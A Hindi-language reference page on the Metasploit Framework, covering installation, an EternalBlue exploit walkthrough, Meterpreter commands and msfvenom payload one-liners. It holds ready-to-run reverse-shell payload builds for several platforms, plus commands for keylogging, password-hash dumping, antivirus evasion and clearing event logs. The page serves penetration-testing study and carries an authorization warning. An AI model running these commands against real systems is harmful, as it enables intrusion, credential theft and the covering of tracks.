🎯 Metasploit Framework - World's Most Popular Exploitation Tool
💣 Exploitation Framework 🎯 Payload Generator 🛡️ Penetration Testing
Category: 6️⃣ Exploitation Tools
📝 Description
Metasploit Framework दुनिया का सबसे लोकप्रिय पेनिट्रेशन टेस्टिंग और एक्सप्लॉइटेशन फ्रेमवर्क है। यह Rapid7 द्वारा डेवलप किया जाता है। Metasploit में हजारों एक्सप्लॉइट्स, पेलोड्स, एनकोडर्स, और पोस्ट-एक्सप्लॉइटेशन मॉड्यूल शामिल हैं। यह आपको वल्नरेबिलिटीज को डिटेक्ट करने, एक्सप्लॉइट करने, और टारगेट सिस्टम पर कंट्रोल लेने की सुविधा देता है।
विशेषता: Metasploit की सबसे बड़ी खासियत है इसका मॉड्यूलर आर्किटेक्चर और इंटरएक्टिव कंसोल (msfconsole)। यह नए एक्सप्लॉइट्स और पेलोड्स को आसानी से जोड़ सकता है।
📦 Installation
Kali Linux (पहले से इंस्टॉल):
msfconsole
Ubuntu/Debian:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall
macOS:
brew install metasploit
Windows: Metasploit Installer डाउनलोड करें।
💻 Common Commands (उदाहरण सहित)
📌 Metasploit कंसोल (msfconsole) शुरू करना:
sudo msfconsole
🔹 1. सभी एक्सप्लॉइट्स देखना:
show exploits
🔹 2. किसी विशेष एक्सप्लॉइट को खोजना:
search eternalblue
🔹 3. एक्सप्लॉइट चुनना और उपयोग करना:
use exploit/windows/smb/ms17_010_eternalblue
🔹 4. एक्सप्लॉइट के ऑप्शन देखना:
show options
🔹 5. टारगेट सेट करना:
set RHOSTS 192.168.1.100
🔹 6. पेलोड सेट करना:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
🔹 7. LHOST (लिसनर IP) सेट करना:
set LHOST 192.168.1.50
🔹 8. एक्सप्लॉइट चलाना:
exploit
🔹 9. Meterpreter कमांड्स - सिस्टम जानकारी:
sysinfo
🔹 10. फाइल सिस्टम ब्राउज़ करना:
ls cd C:\\Users pwd
🔹 11. फाइल डाउनलोड/अपलोड करना:
download C:\\Users\\admin\\Desktop\\secret.txt /home/kali/ upload /home/kali/shell.exe C:\\Windows\\Temp\\
🔹 12. स्क्रीनशॉट लेना:
screenshot
🔹 13. कीस्ट्रोक लॉगिंग:
keyscan_start keyscan_dump
🔹 14. शेल प्राप्त करना:
shell
🔹 15. बैकग्राउंड और सेशन लिस्ट:
background sessions -l sessions -i 1
🔹 16. पेलोड जनरेट करना (msfvenom):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
🔹 17. हैंडलर (Listener) सेट करना:
use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.50 set LPORT 4444 exploit
🎯 Metasploit के मुख्य मॉड्यूल:
- Exploits: वल्नरेबिलिटी को एक्सप्लॉइट करने वाले मॉड्यूल
- Payloads: एक्सप्लॉइट के बाद चलने वाले कोड (Meterpreter, Shell, VNC, etc.)
- Auxiliary: स्कैनिंग, फजिंग, डीडीओएस जैसे मॉड्यूल
- Encoders: एंटीवायरस से बचने के लिए पेलोड एन्कोड करना
- Post: एक्सप्लॉइट के बाद के मॉड्यूल (प्रिविलेज एस्कलेशन, पर्सिस्टेंस, etc.)
- Nops: नॉप स्लेड जनरेटर
🎯 Use Cases (उपयोग के तरीके)
- पेनिट्रेशन टेस्टिंग: वल्नरेबिलिटीज को एक्सप्लॉइट करना और सिस्टम पर कंट्रोल लेना।
- वल्नरेबिलिटी वेरिफिकेशन: स्कैनर से मिली वल्नरेबिलिटीज को वेरिफाई करना।
- पेलोड जनरेशन: कस्टम पेलोड्स बनाना (msfvenom)।
- सोशल इंजीनियरिंग: फिशिंग अटैक के लिए पेलोड जनरेट करना।
- पोस्ट-एक्सप्लॉइटेशन: पासवर्ड हैश डंप करना, स्क्रीनशॉट लेना, कीस्ट्रोक लॉगिंग।
⚙️ Key Features (मुख्य विशेषताएँ)
- ✔️ 2000+ एक्सप्लॉइट्स
- ✔️ 500+ पेलोड्स (Meterpreter, Shell, VNC, etc.)
- ✔️ 50+ एनकोडर्स (एंटीवायरस बायपास)
- ✔️ 100+ पोस्ट-एक्सप्लॉइटेशन मॉड्यूल
- ✔️ msfvenom - पेलोड जनरेटर
- ✔️ Armitage - GUI फ्रंटएंड
- ✔️ डेटाबेस सपोर्ट (स्कैन रिजल्ट सेव करना)
- ✔️ रिपोर्ट जनरेशन
- ✔️ Nmap, Nessus, OpenVAS के साथ इंटीग्रेशन
- ✔️ क्रॉस-प्लेटफॉर्म (Linux, Windows, macOS)
📌 Meterpreter के महत्वपूर्ण कमांड्स:
- sysinfo: सिस्टम जानकारी
- getuid: वर्तमान यूजर
- getsystem: सिस्टम प्रिविलेज प्राप्त करना
- hashdump: पासवर्ड हैश डंप करना
- screenshot: स्क्रीनशॉट लेना
- keyscan_start / keyscan_dump: कीस्ट्रोक लॉगिंग
- shell: कमांड शेल प्राप्त करना
- upload / download: फाइल ट्रांसफर
- migrate: दूसरे प्रोसेस में माइग्रेट करना
- clearev: इवेंट लॉग क्लियर करना
📌 msfvenom के सामान्य पेलोड्स:
# Windows Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe -o shell.exe
# Linux Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o shell.elf
# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -o app.apk
# PHP Webshell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f raw -o shell.php
# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -o shell.py
🔗 Official Resources
- Official Website: https://www.metasploit.com
- GitHub Repository: https://github.com/rapid7/metasploit-framework
- Documentation: https://docs.metasploit.com
- Metasploit Unleashed: Free Training
🔧 Related Tools (समान उपकरण)
- Armitage: Metasploit का GUI फ्रंटएंड
- BeEF: ब्राउज़र एक्सप्लॉइटेशन फ्रेमवर्क
- Empire: पोस्ट-एक्सप्लॉइटेशन फ्रेमवर्क
- Cobalt Strike: कमर्शियल पेनिट्रेशन टेस्टिंग टूल
- ExploitDB: एक्सप्लॉइट्स का डेटाबेस
⚠️ Important Note (सावधानी)
Metasploit एक बेहद शक्तिशाली एक्सप्लॉइटेशन फ्रेमवर्क है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के एक्सप्लॉइट करना, पेलोड execute करना, या Meterpreter सेशन बनाना कानूनी अपराध है। हमेशा अपने खुद के सिस्टम, CTF चैलेंज, या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें। Metasploit का उपयोग सीखने और सुरक्षा ऑडिट के लिए करें, न कि अनधिकृत पहुंच के लिए।